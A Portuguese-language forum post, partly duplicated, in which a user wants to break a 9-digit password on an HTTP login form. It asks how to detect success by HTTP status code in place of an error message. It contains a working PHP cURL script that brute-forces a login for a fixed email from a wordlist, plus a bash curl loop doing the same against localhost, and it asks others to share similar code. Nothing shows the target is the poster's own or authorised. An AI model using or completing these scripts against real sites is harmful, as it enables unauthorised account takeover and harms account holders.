Tweet
Olá pessoal, estou tentando quebrar uma senha de 9 digitos, é um formulario http que é possivel utilizar brute force
quando voce vai utilizar o hydra ou algum outro programa parecido precisa colocar uma mensagem de error de comparação para saber se o login foi efetuado ou não, minha pergunta é ao inves de colocar essa mensagem de comparação não tem como colocar o Status de resposta da página, como 404, 200, 302 para fazer a comparação ?
eu até fis aqui um script que funciona:
só que precisa ficar com o navegador aberto e é ruim, quero utilizar no prompt
alguem pode compartilhar um code neste stilo de comparação de login ?
no shell tentei assim:
mais ae não está funcionando porque acho que precisa pegar o cookie não é, tem relacionado a isso e não funciona, então até eu conseguir fazer um curl no prompt de comando alguem pode compartilhar em alguma linguagem diferente ??
quando voce vai utilizar o hydra ou algum outro programa parecido precisa colocar uma mensagem de error de comparação para saber se o login foi efetuado ou não, minha pergunta é ao inves de colocar essa mensagem de comparação não tem como colocar o Status de resposta da página, como 404, 200, 302 para fazer a comparação ?
eu até fis aqui um script que funciona:
Código:
<?php
set_time_limit(0);
echo '<body style="background:#ccc">';
$handle = @fopen("dic.txt", "r");
if ($handle) {
while (!feof($handle)) {
$buffer = fgets($handle, 4096);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://www.teste.com/Login');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'email=teste@gmail.com&password=' . trim($buffer) . '');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$retorno = curl_exec($ch);
curl_setopt($ch, CURLOPT_URL, 'http://www.teste.com/');
$store = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($httpCode >= 200 && $httpCode < 300) {
echo "<h1>" . $buffer . "</h1>";
break;
}
;
if ($httpCode == 302) {
echo $buffer;
echo "<br>";
}
curl_close($ch);
}
fclose($handle);
}
?>
alguem pode compartilhar um code neste stilo de comparação de login ?
no shell tentei assim:
Código:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done